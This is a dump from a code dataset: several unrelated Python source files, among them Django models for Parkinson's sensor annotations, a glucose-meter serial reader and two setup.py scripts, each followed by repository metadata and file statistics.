    command[9] = payload_len
    for offset, value in enumerate(data):
        command[10 + offset] = value
    command[10 + payload_len] = 255
    command[11 + payload_len:15 + payload_len] = b"\xfe\xfe\xfe\xfe"
    return command
def GenerateReadCommand(i2cAddress, ID, readLocation, numToRead):
    """Build a framed I2C read command packet (fixed 16-byte frame)."""
    TIMEOUT = 100
    command = bytearray(16)
    command[0:4] = b"\xff\xff\xff\xff"
    command[4] = i2cAddress
    command[5] = TIMEOUT
    command[6] = ID
    command[7] = 0x01  # opcode: read
    command[8] = readLocation
    command[9] = numToRead
    command[10] = 0xFF
    command[11:15] = b"\xfe\xfe\xfe\xfe"
    # NOTE(review): byte 15 stays 0, unlike the write frame whose buffer
    # ends exactly on the 0xFE trailer -- confirm against the protocol spec.
    return command
def GenerateToggleCommand(i2cAddress, ID, writeLocation, data):
    """Build the serial frame for a toggle (opcode 3) request.

    NOTE(review): unlike the other generators this relies on the
    module-level ``TIMEOUT`` constant, the ``writeLocation`` parameter is
    never used, and ``data`` is placed in the address-offset byte while a
    fixed 16-byte payload of value 7 is sent -- confirm against the device
    protocol before changing.
    """
    i = 0
    # 31-byte buffer; only indices 0..30 are written below.
    command = bytearray(16 + 15)
    while (i < 4):
        command[i] = 255
        i += 1
    command[4] = i2cAddress
    command[5] = TIMEOUT
    command[6] = ID
    command[7] = 3
    command[8] = data
    command[9] = 16
    command[(10 + 16)] = 255
    i = 0
    # Fixed 16-byte payload, every byte set to 7.
    while (i < 16):
        command[(10 + i)] = 7
        i += 1
    i = 0
    # 4 x 0xFE end-of-frame marker.
    while (i < 4):
        command[((11 + i) + 16)] = 254
        i += 1
    return command
0b89d5110511e9a326a0adf1605527ae76c9199c | 1,220 | py | Python | 1SiteRanking/create_kernel_density_map_arcpy.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 3 | 2021-07-15T15:58:52.000Z | 2021-07-16T13:22:47.000Z | 1SiteRanking/create_kernel_density_map_arcpy.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | null | null | null | 1SiteRanking/create_kernel_density_map_arcpy.py | HCH2CHO/EmotionMap | bc572b4182637dcdd65e9a13c92f2fa0d9a3d680 | [
"MIT"
] | 4 | 2017-08-04T12:41:06.000Z | 2019-01-31T14:55:10.000Z | # coding:utf-8
# version:python2.7.3
# author:kyh
# import x,y data from txt and create kernel density map
import arcpy
from arcpy.sa import *
from arcpy import env
def read_point_data(filepath, i=0):
    """Read tab-separated point rows from *filepath* and write a point shapefile.

    Columns 7 and 8 of each row are taken as X and Y coordinates.

    Bug fix: the original signature required two arguments, but the call in
    ``__main__`` passes only the file path, which raised ``TypeError``;
    ``i`` now defaults to 0.
    """
    # Read data file and create shp file
    with open(filepath, 'r') as pt_file:
        pt = arcpy.Point()
        ptGeoms = []
        # NOTE(review): this reset clobbers any caller-supplied index, so the
        # output name below reflects the row count rather than the input file
        # number -- preserved to keep the original naming behaviour.
        i = 0
        for line in pt_file.readlines():
            i = i + 1
            pt.X = float(line.split('\t')[7])
            pt.Y = float(line.split('\t')[8])
            ptGeoms.append(arcpy.PointGeometry(pt))
        arcpy.CopyFeatures_management(ptGeoms, "D://Users//KYH//Documents//ArcGIS//FlickrPhoto//World_Flickr{0}.shp".format(i))
if __name__ == '__main__':
    # Requires the ArcGIS Spatial Analyst extension for KernelDensity.
    arcpy.CheckOutExtension('Spatial')
    env.workspace=("D:\Users\KYH\Documents\ArcGIS\FlickrPhoto")
    # Process face-emotion point files 0..24, skipping the missing sets 5 and 22.
    for i in range(0,25):
        if (i==5) or (i==22):
            continue
        # NOTE(review): read_point_data is defined with two parameters but is
        # called with one here -- raises TypeError unless the function gains a
        # default for its second parameter.
        read_point_data("D:\\Users\\KYH\\Desktop\\EmotionMap\\FlickrEmotionData\\3faces_emotion\\faceflickr{0}.txt".format(i))
        # Kernel Density Analysis
        out_kernel_density=KernelDensity("World_Flickr{0}.shp".format(i),"NONE")
        out_kernel_density.save("D:\Users\KYH\Documents\ArcGIS\FlickrPhoto\kd_Face{0}".format(i))
| 33.888889 | 127 | 0.645902 | 172 | 1,220 | 4.447674 | 0.476744 | 0.067974 | 0.047059 | 0.070588 | 0.194771 | 0.194771 | 0 | 0 | 0 | 0 | 0 | 0.019527 | 0.202459 | 1,220 | 35 | 128 | 34.857143 | 0.766701 | 0.128689 | 0 | 0 | 0 | 0 | 0.276777 | 0.236019 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.130435 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b944182e57c98d2c412133b9ff0a2ad81333fdb | 737 | py | Python | setup.py | ZeroCater/zerocaterpy | 824af8613db0c5f203c0b2f7cebd830ee80eea5d | [
"MIT"
] | null | null | null | setup.py | ZeroCater/zerocaterpy | 824af8613db0c5f203c0b2f7cebd830ee80eea5d | [
"MIT"
] | null | null | null | setup.py | ZeroCater/zerocaterpy | 824af8613db0c5f203c0b2f7cebd830ee80eea5d | [
"MIT"
] | null | null | null | from setuptools import setup
# Packaging metadata for the ``zerocater`` client library (runs at build time).
setup(name='zerocater',
      version='0.0.1',
      description="Python interface to ZeroCater",
      long_description='',
      keywords='zerocater food delivery meal planning catering lunch',
      author='ZeroCater',
      author_email='tech@zerocater.com',
      url='https://github.com/ZeroCater/PyZeroCater',
      download_url='https://github.com/ZeroCater/PyZeroCater/tarball/0.0.1',
      license='MIT',
      packages=['zerocater'],
      classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python",
        "Development Status :: 5 - Production/Stable",
        "Intended Audience :: Developers",
        "Topic :: Internet :: WWW/HTTP",
      ]
)
0b975c6ddf1a134fa942ba06d2fe6a39b749365f | 6,435 | py | Python | pdsensorvis/sensors/models.py | mickeykkim/masters-project-sphere | 6dbe0be877058e647f5e3822932e5a70f181bb53 | [
"MIT"
] | 2 | 2019-10-05T20:59:41.000Z | 2019-11-01T20:25:39.000Z | pdsensorvis/sensors/models.py | mickeykkim/masters-project-sphere | 6dbe0be877058e647f5e3822932e5a70f181bb53 | [
"MIT"
] | 6 | 2019-10-24T12:28:02.000Z | 2021-08-09T09:56:26.000Z | pdsensorvis/sensors/models.py | mickeykkim/masters-project-sphere | 6dbe0be877058e647f5e3822932e5a70f181bb53 | [
"MIT"
] | null | null | null | from django.db import models
from django.urls import reverse
from django.contrib.auth.models import User
from django.utils import timezone
import uuid
# (stored code, human-readable label) choices for the annotation CharFields below.
ANNOTATION = (
    ('asm', 'Asymmetry'),
    ('dst', 'Dystonia'),
    ('dsk', 'Dyskensia'),
    ('ebt', 'En Bloc Turning'),
    ('str', 'Short Stride Length'),
    ('mov', 'Slow/Hesitant Movement'),
    ('pos', 'Stooped Posture'),
    ('trm', 'Tremor'),
    ('oth', 'Other/Activity')
)
# Named video frame rates used as choices for CameraData.framerate.
# NOTE: the NAME is the stored value and the number is the displayed label.
FRAME_RATES = (
    ('NTSC_Film', 23.98),
    ('Film', 24),
    ('PAL', 25),
    ('NTSC', 29.97),
    ('Web', 30),
    ('PAL_HD', 50),
    ('NTSC_HD', 59.94),
    ('High', 60),
)
class PatientData(models.Model):
    """A patient record: name, date of birth and free-text notes."""
    id = models.AutoField(primary_key=True)
    first_name = models.CharField(max_length=50, help_text='Patient first name')
    last_name = models.CharField(max_length=50, help_text='Patient last name')
    date_of_birth = models.DateField(help_text='Patient date of birth')
    notes = models.CharField(max_length=500, help_text='Notes regarding patient')
    class Meta:
        ordering = ['last_name']
        permissions = (("can_alter_patientdata", "Can create or edit patient data entries."),)
    def get_absolute_url(self):
        """Return the canonical detail URL for this patient."""
        return reverse('patientdata-detail', args=[str(self.id)])
    def __str__(self):
        """Display as "Last, First"."""
        return f'{self.last_name}, {self.first_name}'
class WearableData(models.Model):
    """A wearable-sensor recording session belonging to a patient."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='Unique ID for this wearable data')
    patient = models.ForeignKey('PatientData', on_delete=models.CASCADE, null=True, related_name='wearables')
    filename = models.FileField(upload_to='wearable/', help_text='Wearable data file')
    time = models.DateTimeField(help_text='Session date & time')
    note = models.CharField(max_length=500, help_text='Note regarding wearable data')
    class Meta:
        ordering = ['patient', '-time']
        permissions = (("can_alter_wearabledata", "Can create or edit wearable data entries."),)
    def get_absolute_url(self):
        """Return the canonical detail URL for this wearable session."""
        return reverse('wearabledata-detail', args=[str(self.id)])
    def __str__(self):
        """Display as "patient (session time)"."""
        return f'{self.patient} ({self.time})'
class CameraData(models.Model):
    """A camera recording session for a patient, with video file and framerate."""
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, help_text='Unique ID for this wearable data')
    patient = models.ForeignKey('PatientData', on_delete=models.CASCADE, null=True, related_name='cameras')
    filename = models.FileField(upload_to='camera/', help_text='Camera video file')
    framerate = models.CharField(
        max_length=9,
        choices=FRAME_RATES,
        default='Film',
        help_text='Video framerate',
    )
    time = models.DateTimeField(help_text='Session date & time')
    note = models.CharField(max_length=500, help_text='Note regarding camera data')
    class Meta:
        ordering = ['patient', '-time']
        permissions = (("can_alter_cameradata", "Can create or edit camera data entries."),)
    def get_absolute_url(self):
        """Return the canonical detail URL for this camera session."""
        return reverse('cameradata-detail', args=[str(self.id)])
    def __str__(self):
        """Display as "patient (session time)"."""
        return f'{self.patient} ({self.time})'
    def get_user_annotations(self, user=User):
        """Return this session's annotations made by *user*.

        Bug fix: the original hard-coded ``annotator=User`` -- the model
        class itself, which can never match a stored row.  Pass an actual
        ``User`` instance; the class-valued default is kept only so the
        zero-argument call signature remains accepted.
        """
        return self.c_annotations.filter(annotator=user)
class WearableAnnotation(models.Model):
    """A symptom annotation over a frame range of a wearable recording."""
    id = models.AutoField(primary_key=True)
    wearable = models.ForeignKey('WearableData', on_delete=models.CASCADE, null=True, related_name='w_annotations')
    frame_begin = models.PositiveIntegerField()
    frame_end = models.PositiveIntegerField()
    annotator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    annotation = models.CharField(
        max_length=3,
        choices=ANNOTATION,
        default='oth',
        help_text='PD Symptom',
    )
    note = models.CharField(max_length=500, help_text='Note regarding annotation', null=True, blank=True)
    class Meta:
        ordering = ['frame_begin']
        permissions = (("can_alter_wearableannotation", "Can create or edit wearable annotations."),)
    def get_absolute_url(self):
        """Return the detail URL, namespaced by the parent wearable's id."""
        return reverse('wearableannotation-detail', args=[str(self.wearable.id), str(self.id)])
    def __str__(self):
        """Display as "wearable - (begin-end) - symptom label"."""
        return f'{self.wearable} - ({self.frame_begin}-{self.frame_end}) - {self.get_annotation_display()}'
class CameraAnnotation(models.Model):
    """A symptom annotation over a timecode range of a camera recording."""
    id = models.AutoField(primary_key=True)
    camera = models.ForeignKey('CameraData', on_delete=models.CASCADE, null=True, related_name='c_annotations')
    time_begin = models.CharField(max_length=11, help_text='hh:mm:ss:ff')
    time_end = models.CharField(max_length=11, help_text='hh:mm:ss:ff')
    annotator = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    annotation = models.CharField(
        max_length=3,
        choices=ANNOTATION,
        default='oth',
        help_text='PD Symptom',
    )
    note = models.CharField(max_length=500, help_text='Note regarding annotation', null=True, blank=True)
    class Meta:
        ordering = ['camera', 'time_begin']
        permissions = (("can_alter_cameraannotation", "Can create or edit camera annotations."),)
    def get_absolute_url(self):
        """Return the detail URL, namespaced by the parent camera's id."""
        return reverse('cameraannotation-detail', args=[str(self.camera.id), str(self.id)])
    def __str__(self):
        """Display as "camera - (begin-end) - symptom label"."""
        return f'{self.camera} - ({self.time_begin}-{self.time_end}) - {self.get_annotation_display()}'
class CameraAnnotationComment(models.Model):
    """A threaded text comment attached to a CameraAnnotation."""
    id = models.AutoField(primary_key=True)
    annotation = models.ForeignKey('CameraAnnotation', on_delete=models.CASCADE, related_name='comments')
    author = models.ForeignKey(User, on_delete=models.SET_NULL, null=True)
    timestamp = models.DateTimeField(default=timezone.now)
    text = models.TextField()
    class Meta:
        ordering = ['annotation', 'timestamp']
        permissions = (("can_alter_cameraannotation_comment", "Can create or edit camera annotation comments."),)
    def __str__(self):
        """Display the raw comment text."""
        return self.text
class WearableDataPoint(models.Model):
    """A single (frame, magnitude) sample of a wearable recording."""
    id = models.AutoField(primary_key=True)
    wearable = models.ForeignKey('WearableData', on_delete=models.CASCADE, null=True, related_name='data_point')
    frame = models.PositiveIntegerField()
    magnitude = models.FloatField()
    class Meta:
        ordering = ['frame']
        permissions = (("can_alter_wearabledata_point", "Can create or edit wearable data point."),)
    def __str__(self):
        """Display as "wearable-id - (frame, magnitude)"."""
        return f'{self.wearable.id} - ({self.frame}, {self.magnitude})'
| 37.631579 | 116 | 0.685004 | 787 | 6,435 | 5.418043 | 0.208386 | 0.035647 | 0.050657 | 0.067542 | 0.585366 | 0.550657 | 0.523921 | 0.507036 | 0.446998 | 0.37031 | 0 | 0.009445 | 0.177312 | 6,435 | 170 | 117 | 37.852941 | 0.795995 | 0 | 0 | 0.343284 | 0 | 0.014925 | 0.261849 | 0.052991 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097015 | false | 0 | 0.037313 | 0.097015 | 0.626866 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0b9809b2c18e28f3af61ecc6021ff494abd1e0f4 | 533 | py | Python | setup.py | soumyarani/mopac | 72f10fdd3ea3c9c61b6c808ca07ee9031b7d4aa8 | [
"MIT"
] | 20 | 2021-03-16T08:18:01.000Z | 2022-03-12T13:46:43.000Z | setup.py | soumyarani/mopac | 72f10fdd3ea3c9c61b6c808ca07ee9031b7d4aa8 | [
"MIT"
] | 1 | 2021-05-13T14:49:25.000Z | 2021-05-13T19:45:26.000Z | setup.py | soumyarani/mopac | 72f10fdd3ea3c9c61b6c808ca07ee9031b7d4aa8 | [
"MIT"
] | 5 | 2020-11-01T15:46:39.000Z | 2021-07-30T13:12:06.000Z | from distutils.core import setup
# Packaging metadata for ``mopac`` (runs at build time).
# Import setup from setuptools: distutils was deprecated (PEP 632) and
# removed from the standard library in Python 3.12, so the earlier
# ``from distutils.core import setup`` no longer works there.
from setuptools import setup, find_packages
setup(
    name='mopac',
    packages=find_packages(),
    version='0.1',
    description='Model-based policy optimization',
    long_description=open('./README.md').read(),
    author='',
    author_email='',
    url='',
    entry_points={
        'console_scripts': (
            'mopac=softlearning.scripts.console_scripts:main',
            'viskit=mopac.scripts.console_scripts:main'
        )
    },
    requires=(),
    zip_safe=True,
    license='MIT'
)
| 23.173913 | 62 | 0.626642 | 56 | 533 | 5.803571 | 0.696429 | 0.129231 | 0.129231 | 0.153846 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004878 | 0.230769 | 533 | 22 | 63 | 24.227273 | 0.787805 | 0 | 0 | 0 | 0 | 0 | 0.292683 | 0.165103 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.095238 | 0 | 0.095238 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b9897a43237e684b6c66f4d6a3b18dc5aaad9da | 1,217 | py | Python | onetouch.py | kakoni/insulaudit | 18fe0802bafe5764882ac4e65e472fdc840baa45 | [
"MIT"
] | 1 | 2020-11-28T13:23:58.000Z | 2020-11-28T13:23:58.000Z | onetouch.py | kakoni/insulaudit | 18fe0802bafe5764882ac4e65e472fdc840baa45 | [
"MIT"
] | null | null | null | onetouch.py | kakoni/insulaudit | 18fe0802bafe5764882ac4e65e472fdc840baa45 | [
"MIT"
] | null | null | null | #!/usr/bin/python
import user
import serial
from pprint import pprint, pformat
import insulaudit
from insulaudit.data import glucose
from insulaudit.log import io
from insulaudit.devices import onetouch2
import sys
# Serial device node of the OneTouch meter's USB adapter.
PORT = '/dev/ttyUSB0'
def get_serial( port, timeout=2 ):
    """Open *port* as a pyserial connection with the given timeout in seconds."""
    return serial.Serial( port, timeout=timeout )
def init( ):
    """Connect to a OneTouch Ultra2 meter on PORT, dump its identity and
    glucose records to stdout, write the records to sugars-debug.txt and
    return the open device handle.  Exits with status 1 if the meter does
    not answer the serial-number query.  (Python 2 print statements.)"""
    mini = onetouch2.OneTouchUltra2( PORT, 5 )
    print "is open? %s\n timeout: %s" % ( mini.serial.isOpen( ), mini.serial.getTimeout() )
    print ""
    print "read serial number"
    # NOTE(review): this local shadows the imported ``serial`` module for the
    # rest of the function body.
    serial = mini.execute( onetouch2.ReadSerial( ) )
    print "serial number: %s" % serial
    print ""
    # An empty serial number means the meter did not respond.
    if serial == "":
        print "could not connect"
        sys.exit(1)
    print ""
    print "read firmware number"
    firmware = mini.execute( onetouch2.ReadFirmware( ) )
    print "firmware: %s" % firmware
    print ""
    print "RFID"
    print mini.execute( onetouch2.ReadRFID( ) )
    print "GLUCOSE"
    data = mini.read_glucose( )
    print data
    print "len glucose: %s" % len( data )
    # read_glucose returns a (header, records) pair.
    head, body = data
    output = open( 'sugars-debug.txt', 'w' )
    output.write( glucose.format_records( body ) )
    output.write( '\n' )
    output.close( )
    return mini
if __name__ == '__main__':
    # Connect to the meter and log the resulting handle.
    port = init()
    io.info( port )
| 22.537037 | 89 | 0.67461 | 157 | 1,217 | 5.159236 | 0.414013 | 0.051852 | 0.074074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010235 | 0.197206 | 1,217 | 53 | 90 | 22.962264 | 0.818833 | 0.013147 | 0 | 0.095238 | 0 | 0 | 0.145121 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.190476 | null | null | 0.380952 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b9b80c225b518a078b36396f1fbccc56916e124 | 738 | py | Python | server/waitFramerate.py | mboerwinkle/RingGame | 5a9b6a6ea394c1e88689fa062d4d348383ab406a | [
"MIT"
] | null | null | null | server/waitFramerate.py | mboerwinkle/RingGame | 5a9b6a6ea394c1e88689fa062d4d348383ab406a | [
"MIT"
] | null | null | null | server/waitFramerate.py | mboerwinkle/RingGame | 5a9b6a6ea394c1e88689fa062d4d348383ab406a | [
"MIT"
] | null | null | null | import time
#Timing stuff
# Module-level state shared across calls: monotonic timestamp at which the
# current frame is considered to have started, and the previous frame's
# measured duration.
lastTime = None
prevFrameTime = 0;
def waitFramerate(T): #TODO if we have enough time, call the garbage collector
	"""Sleep just long enough to hold a frame period of T seconds.

	Call once per frame.  The first call only records the start time.
	NOTE(review): the "Peak frame" message actually reports the *previous*
	frame's duration when it exceeded both the current frame and 1.2*T --
	it is not a running maximum.
	"""
	global lastTime, prevFrameTime
	ctime = time.monotonic()
	if lastTime:
		frameTime = ctime-lastTime #how long the last frame took
		sleepTime = T-frameTime #how much time is remaining in target framerate
		if prevFrameTime > frameTime and prevFrameTime > 1.2*T:
			print("Peak frame took "+str(prevFrameTime)[:5]+"/"+str(int(1.0/prevFrameTime))+" FPS (Target "+str(T)[:5]+")")
		if(sleepTime <= 0): #we went overtime. set start of next frame to now, and continue
			lastTime = ctime
		else:
			# Advance by exactly T so small errors do not accumulate.
			lastTime = lastTime+T
			time.sleep(sleepTime)
		prevFrameTime = frameTime
	else:
		lastTime = ctime
| 32.086957 | 114 | 0.720867 | 103 | 738 | 5.165049 | 0.543689 | 0.033835 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013093 | 0.172087 | 738 | 22 | 115 | 33.545455 | 0.85761 | 0.275068 | 0 | 0.210526 | 0 | 0 | 0.058491 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 1 | 0.052632 | false | 0 | 0.052632 | 0 | 0.105263 | 0.052632 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0baeb09b96866048e3277bdd11b177c6f437a60e | 1,217 | py | Python | 01-Exercicios/Aula001/Ex2.py | AmandaRH07/Python_Entra21 | 4084962508f1597c0498d8b329e0f45e2ac55302 | [
"MIT"
] | null | null | null | 01-Exercicios/Aula001/Ex2.py | AmandaRH07/Python_Entra21 | 4084962508f1597c0498d8b329e0f45e2ac55302 | [
"MIT"
] | null | null | null | 01-Exercicios/Aula001/Ex2.py | AmandaRH07/Python_Entra21 | 4084962508f1597c0498d8b329e0f45e2ac55302 | [
"MIT"
] | null | null | null | #--- Exercício 2 - Variáveis
#--- Crie um menu para um sistema de cadastro de funcionários
#--- O menu deve ser impresso com a função format()
#--- As opções devem ser variáveis do tipo inteiro
#--- As descrições das opções serão:
#--- Cadastrar funcionário
#--- Listar funcionários
#--- Editar funcionário
#--- Deletar funcionário
#--- Sair
#--- Além das opções o menu deve conter um cabeçalho e um rodapé
#--- Entre o cabeçalho e o menu e entre o menu e o rodapé deverá ter espaçamento de 3 linhas
#--- Deve ser utilizado os caracteres especiais de quebra de linha e de tabulação
# Read the user's menu choice (1-5); the menu text is filled in via str.format().
opcao = int(input("""
SISTEMA DE CADASTRO DE FUNCIONARIO\n\n\n
{} - Cadastrar Funcionário
{} - Listar Funcinários
{} - Editar Funcionário
{} - Deletar Funcionário
{} - Sair\n\n\n
Escolha uma opção: """.format(1,2,3,4,5)))
# Echo which employee-registry option was chosen (messages are in Portuguese,
# kept verbatim as they are user-facing runtime strings).
if opcao == 1:
    print("A opção escolhida foi 'Cadastrar funcionário'")
elif opcao == 2:
    print("A opção escolhida foi 'Listar funcionários'")
elif opcao == 3:
    print("A opção escolhida foi 'Editar funcionário'")
elif opcao == 4:
    print("A opção escolhida foi 'Deletar funcionário'")
elif opcao == 5:
    print("A opção escolhida foi 'Sair'")
else:
    # Any other value is silently ignored.
    pass
| 32.891892 | 92 | 0.676253 | 171 | 1,217 | 4.812866 | 0.415205 | 0.036452 | 0.066829 | 0.121507 | 0.234508 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012435 | 0.207067 | 1,217 | 36 | 93 | 33.805556 | 0.840415 | 0.470008 | 0 | 0 | 0 | 0 | 0.638669 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.05 | 0 | 0 | 0 | 0.25 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0bb4673a2136b7bf006e51e515e0e3d35ea020dd | 417 | py | Python | nlu_hyperopt/space.py | JulianGerhard21/nlu-hyperopt | 3d16fda97fa7cf1337b19395a57780e6e2dc9bd3 | [
"Apache-2.0"
] | null | null | null | nlu_hyperopt/space.py | JulianGerhard21/nlu-hyperopt | 3d16fda97fa7cf1337b19395a57780e6e2dc9bd3 | [
"Apache-2.0"
] | null | null | null | nlu_hyperopt/space.py | JulianGerhard21/nlu-hyperopt | 3d16fda97fa7cf1337b19395a57780e6e2dc9bd3 | [
"Apache-2.0"
] | 1 | 2021-07-08T11:40:27.000Z | 2021-07-08T11:40:27.000Z | from hyperopt import hp
# Define the search space here, e.g.
# from hyperopt.pyll.base import scope
# search_space = {
# 'epochs': hp.qloguniform('epochs', 0, 4, 2),
# 'max_df': hp.uniform('max_df', 1, 2),
# 'max_ngrams': scope.int(hp.quniform('max_ngram', 3, 9, 1))
# }
# Default search space: Try different numbers of training epochs.
# Single hyperparameter "epochs": exp(Uniform(0, 4)) rounded to multiples of 2,
# i.e. even values roughly between 2 and 54.
search_space = {"epochs": hp.qloguniform("epochs", 0, 4, 2)}
| 29.785714 | 65 | 0.654676 | 63 | 417 | 4.238095 | 0.555556 | 0.164794 | 0.127341 | 0.142322 | 0.292135 | 0.292135 | 0.292135 | 0.292135 | 0.292135 | 0 | 0 | 0.032164 | 0.179856 | 417 | 13 | 66 | 32.076923 | 0.748538 | 0.748201 | 0 | 0 | 0 | 0 | 0.125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
0bb56b74527c4ab3380dff7d3851c648cd78de0c | 347 | py | Python | src/workflows/__init__.py | stufisher/python-workflows | f1f67bb56a0f8a6820762f68e2e59ade2da60a95 | [
"BSD-3-Clause"
] | null | null | null | src/workflows/__init__.py | stufisher/python-workflows | f1f67bb56a0f8a6820762f68e2e59ade2da60a95 | [
"BSD-3-Clause"
] | null | null | null | src/workflows/__init__.py | stufisher/python-workflows | f1f67bb56a0f8a6820762f68e2e59ade2da60a95 | [
"BSD-3-Clause"
] | null | null | null | __version__ = "2.18"
def version():
"""Returns the version number of the installed workflows package."""
return __version__
class Error(Exception):
    """Base for all exceptions the workflows package raises on purpose."""


class Disconnected(Error):
    """Signals that the connection could not be set up or was lost."""
| 23.133333 | 79 | 0.723343 | 42 | 347 | 5.785714 | 0.761905 | 0.131687 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010526 | 0.178674 | 347 | 14 | 80 | 24.785714 | 0.842105 | 0.576369 | 0 | 0 | 0 | 0 | 0.030534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
0bc0f8ad9a5e857c61031c1ca0a45f2bb10b8808 | 783 | py | Python | Exareme-Docker/src/mip-algorithms/HEALTH_CHECK/global.py | tchamabe1979/exareme | 462983e4feec7808e1fd447d02901502588a8879 | [
"MIT"
] | null | null | null | Exareme-Docker/src/mip-algorithms/HEALTH_CHECK/global.py | tchamabe1979/exareme | 462983e4feec7808e1fd447d02901502588a8879 | [
"MIT"
] | null | null | null | Exareme-Docker/src/mip-algorithms/HEALTH_CHECK/global.py | tchamabe1979/exareme | 462983e4feec7808e1fd447d02901502588a8879 | [
"MIT"
] | null | null | null | import sys
import json
from os import path
from argparse import ArgumentParser
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))) + '/utils/')
from algorithm_utils import set_algorithms_output_data
from health_check_lib import HealthCheckLocalDT
def main():
    """Load the local health-check DB named by -local_step_dbs and emit the
    active-node list as the algorithm's JSON output."""
    # Parse arguments
    parser = ArgumentParser()
    parser.add_argument('-local_step_dbs', required=True, help='Path to local db.')
    # parse_known_args tolerates any extra arguments supplied by the runtime.
    args, unknown = parser.parse_known_args()
    local_dbs = path.abspath(args.local_step_dbs)
    local_out = HealthCheckLocalDT.load(local_dbs)
    nodes = {}
    nodes["active_nodes"] = local_out.get_data()
    # Return the algorithm's output
    set_algorithms_output_data(json.dumps(nodes))
if __name__ == '__main__':
    main()
| 27.964286 | 84 | 0.715198 | 100 | 783 | 5.26 | 0.51 | 0.041825 | 0.057034 | 0.087452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.186462 | 783 | 27 | 85 | 29 | 0.825746 | 0.057471 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0.333333 | 0 | 0.388889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
e7ea14302b331a9466a14df8ced10e7042b53923 | 7,081 | py | Python | core/data/dataloader/upb_kitti.py | nemodrive/awesome-semantic-segmentation-pytorch | fa0e4174004822ace0560cc046c2fbdb81f1e1b9 | [
"Apache-2.0"
] | null | null | null | core/data/dataloader/upb_kitti.py | nemodrive/awesome-semantic-segmentation-pytorch | fa0e4174004822ace0560cc046c2fbdb81f1e1b9 | [
"Apache-2.0"
